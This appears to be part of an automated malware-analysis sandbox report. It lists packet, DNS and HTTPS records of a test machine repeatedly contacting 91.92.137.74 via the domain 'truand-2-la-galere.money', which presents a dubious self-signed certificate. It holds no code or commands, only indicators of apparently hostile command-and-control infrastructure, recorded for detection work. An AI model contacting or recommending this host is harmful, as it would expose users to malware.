Mai 7, 2018 14:51:13.670511007 MESZ49205443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:13.670537949 MESZ4434920591.92.137.74192.168.1.81
Mai 7, 2018 14:51:13.677241087 MESZ49205443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:13.677268028 MESZ4434920591.92.137.74192.168.1.81
Mai 7, 2018 14:51:13.988236904 MESZ4434920591.92.137.74192.168.1.81
Mai 7, 2018 14:51:13.988382101 MESZ49205443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:13.988413095 MESZ4434920591.92.137.74192.168.1.81
Mai 7, 2018 14:51:13.991056919 MESZ49205443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:13.991077900 MESZ4434920591.92.137.74192.168.1.81
Mai 7, 2018 14:51:13.995068073 MESZ49205443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:14.004045010 MESZ49205443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:14.004246950 MESZ4434920591.92.137.74192.168.1.81
Mai 7, 2018 14:51:14.004774094 MESZ49205443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:14.386193991 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:14.386240005 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:14.386317015 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:14.387579918 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:14.387603998 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.165487051 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.165676117 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.462631941 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.462667942 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.468892097 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.468916893 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.714571953 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.714781046 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.714803934 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.715380907 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.715715885 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.715858936 MESZ4434920691.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.716389894 MESZ49206443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.832990885 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.833055019 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:15.834505081 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.835881948 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:15.835907936 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:16.314941883 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:16.315368891 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:16.396033049 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:16.396069050 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:16.403004885 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:16.403029919 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:16.606842995 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:16.607000113 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:16.607028008 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:16.612224102 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:16.926951885 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:16.927186966 MESZ4434920791.92.137.74192.168.1.81
Mai 7, 2018 14:51:16.927277088 MESZ49207443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.054488897 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.054547071 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.054647923 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.055788994 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.055821896 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.557553053 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.557775974 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.605775118 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.605834961 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.616370916 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.616406918 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.980303049 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.980737925 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.980798960 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.983159065 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.983428955 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:17.983544111 MESZ4434920891.92.137.74192.168.1.81
Mai 7, 2018 14:51:17.983642101 MESZ49208443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:18.145566940 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:18.145632982 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:18.145716906 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:18.147061110 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:18.147094965 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:18.966559887 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:18.966701984 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:18.977471113 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:18.977492094 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:18.983933926 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:18.983954906 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:19.455952883 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:19.456152916 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:19.456177950 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:19.456770897 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:19.456960917 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:19.457290888 MESZ4434920991.92.137.74192.168.1.81
Mai 7, 2018 14:51:19.457432985 MESZ49209443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:19.589975119 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:19.590029001 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:19.590120077 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:19.591428041 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:19.591453075 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.105134964 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.107435942 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.130228043 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.130281925 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.138485909 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.138524055 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.374150038 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.374330044 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.374356985 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.375066042 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.784604073 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.784854889 MESZ4434921091.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.787097931 MESZ49210443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.928936005 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.928981066 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:20.929049969 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.930382013 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:20.930406094 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:21.508214951 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:21.508389950 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:21.528871059 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:21.528904915 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:21.535285950 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:21.535316944 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:21.775418997 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:21.775573969 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:21.775599003 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:21.782768965 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:21.782799959 MESZ4434921191.92.137.74192.168.1.81
Mai 7, 2018 14:51:21.782876015 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:21.783058882 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:21.783128023 MESZ49211443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.046113014 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.046166897 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.046267033 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.047467947 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.047498941 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.530987978 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.531269073 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.621103048 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.621160984 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.628624916 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.628668070 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.808823109 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.808934927 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.808964968 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.809536934 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.946433067 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:22.946593046 MESZ4434921291.92.137.74192.168.1.81
Mai 7, 2018 14:51:22.949110985 MESZ49212443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:23.074807882 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:23.074856997 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:23.074965954 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:23.076220989 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:23.076246023 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:23.839342117 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:23.839447975 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:23.851680994 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:23.851707935 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:23.857605934 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:23.857645988 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:24.080918074 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:24.081113100 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:24.081167936 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:24.082355022 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:24.090504885 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:24.090693951 MESZ4434921391.92.137.74192.168.1.81
Mai 7, 2018 14:51:24.090854883 MESZ49213443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:24.205662012 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:24.205729961 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:24.205800056 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:24.207050085 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:24.207071066 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:24.999526024 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:24.999700069 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.280930996 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.280961990 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:25.287101030 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.287126064 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:25.697721004 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:25.697900057 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.697936058 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:25.698018074 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.699800014 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.699963093 MESZ4434921491.92.137.74192.168.1.81
Mai 7, 2018 14:51:25.700050116 MESZ49214443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.925775051 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.925848961 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:25.925982952 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.927695036 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:25.927731037 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:26.590641022 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:26.590735912 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:26.778919935 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:26.778945923 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:26.785649061 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:26.785669088 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.096642017 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.096735954 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.096757889 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.097254038 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.097275019 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.098086119 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.098216057 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.098305941 MESZ4434921591.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.098440886 MESZ49215443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.225277901 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.225330114 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.225446939 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.226850986 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.226878881 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.770447016 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.770550966 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.820679903 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.820713043 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:27.827807903 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:27.827835083 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.041178942 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.041333914 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.041363955 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.043067932 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.043093920 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.047049046 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.271234035 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.271365881 MESZ4434921691.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.272211075 MESZ49216443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.398866892 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.398942947 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.399215937 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.400495052 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.400538921 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.899020910 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.899207115 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.930330992 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.930361986 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:28.936846972 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:28.936903000 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:29.302527905 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:29.302795887 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:29.302823067 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:29.311250925 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:29.313954115 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:29.314186096 MESZ4434921791.92.137.74192.168.1.81
Mai 7, 2018 14:51:29.314917088 MESZ49217443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:29.590153933 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:29.590214968 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:29.590341091 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:29.591768026 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:29.591793060 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:30.110835075 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:30.111113071 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:30.130450964 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:30.130568027 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:30.138745070 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:30.138782978 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:30.495927095 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:30.496085882 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:30.496140003 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:30.502765894 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:30.941504002 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:30.941689968 MESZ4434921891.92.137.74192.168.1.81
Mai 7, 2018 14:51:30.942125082 MESZ49218443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:31.068046093 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:31.068104029 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:31.068167925 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:31.069176912 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:31.069207907 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:31.782279015 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:31.782521963 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:31.791382074 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:31.791449070 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:31.796864986 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:31.796895027 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.156567097 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.156727076 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.156758070 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.157248974 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.157921076 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.158001900 MESZ4434921991.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.158116102 MESZ49219443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.268018961 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.268065929 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.268140078 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.269782066 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.269809961 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.784292936 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.784446955 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.804702997 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.804732084 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:32.811327934 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:32.811358929 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:33.140250921 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:33.140520096 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:33.140562057 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:33.141038895 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:33.141376972 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:33.141726971 MESZ4434922091.92.137.74192.168.1.81
Mai 7, 2018 14:51:33.141849995 MESZ49220443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:33.479746103 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:33.479799986 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:33.480123997 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:33.481240034 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:33.481271029 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:34.041851044 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:34.041918039 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:34.043083906 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:34.043106079 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:34.044675112 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:34.044697046 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:34.403759956 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:34.403845072 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:34.403867006 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:34.404123068 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:34.404144049 MESZ4434922191.92.137.74192.168.1.81
Mai 7, 2018 14:51:34.404304028 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:34.404372931 MESZ49221443192.168.1.8191.92.137.74
Mai 7, 2018 14:51:34.404427052 MESZ49221443192.168.1.8191.92.137.74

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Mai 7, 2018 14:49:36.631899118 MESZ6370053192.168.1.818.8.8.8
Mai 7, 2018 14:49:36.814659119 MESZ53637008.8.8.8192.168.1.81
Mai 7, 2018 14:49:50.485364914 MESZ5424453192.168.1.818.8.8.8
Mai 7, 2018 14:49:50.615817070 MESZ53542448.8.8.8192.168.1.81
Mai 7, 2018 14:49:50.626178980 MESZ6041353192.168.1.818.8.8.8
Mai 7, 2018 14:49:50.746747017 MESZ53604138.8.8.8192.168.1.81
Mai 7, 2018 14:49:57.409387112 MESZ4991253192.168.1.818.8.8.8
Mai 7, 2018 14:49:57.457447052 MESZ53499128.8.8.8192.168.1.81
Mai 7, 2018 14:49:59.604815960 MESZ6299353192.168.1.818.8.8.8
Mai 7, 2018 14:49:59.656533003 MESZ53629938.8.8.8192.168.1.81
Mai 7, 2018 14:49:59.668673992 MESZ5878053192.168.1.818.8.8.8
Mai 7, 2018 14:49:59.710364103 MESZ53587808.8.8.8192.168.1.81
Mai 7, 2018 14:50:20.956351995 MESZ5493453192.168.1.818.8.8.8
Mai 7, 2018 14:50:21.522135973 MESZ53549348.8.8.8192.168.1.81
Mai 7, 2018 14:50:21.526216030 MESZ6284553192.168.1.818.8.8.8
Mai 7, 2018 14:50:21.625046015 MESZ53628458.8.8.8192.168.1.81

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Mai 7, 2018 14:49:36.631899118 MESZ192.168.1.818.8.8.80xe63bStandard query (0)truand-2-la-galere.moneyA (IP address)IN (0x0001)
Mai 7, 2018 14:49:57.409387112 MESZ192.168.1.818.8.8.80xe65eStandard query (0)truand-2-la-galere.moneyA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Mai 7, 2018 14:49:36.814659119 MESZ8.8.8.8192.168.1.810xe63bNo error (0)truand-2-la-galere.money91.92.137.74A (IP address)IN (0x0001)
Mai 7, 2018 14:49:57.457447052 MESZ8.8.8.8192.168.1.810xe65eNo error (0)truand-2-la-galere.money91.92.137.74A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • truand-2-la-galere.money

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
Mai 7, 2018 14:49:49.415469885 MESZ4434916291.92.137.74192.168.1.81CN=truand-2-la-galere.moneyCN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=USSun May 06 14:49:49 CEST 2018Mon May 06 14:49:49 CEST 2019[[ Version: V3 Subject: CN=truand-2-la-galere.money Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 173482083284325052510782864429137664633579691511543703039539002342296275109238117625872040139262896379538795260129849870433580344922031107699417419151540910326435169336338847748055467257593289358534582447761859028139174157241477124077669012417476784832342735303634755439494836929402863720187668290571419613987 public exponent: 3 Validity: [From: Sun May 06 14:49:49 CEST 2018, To: Mon May 06 14:49:49 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 0311340b 93cf92e2 c28a4c49 0bc38176 5929]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: truand-2-la-galere.money][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E7 21 6A 88 08 3C 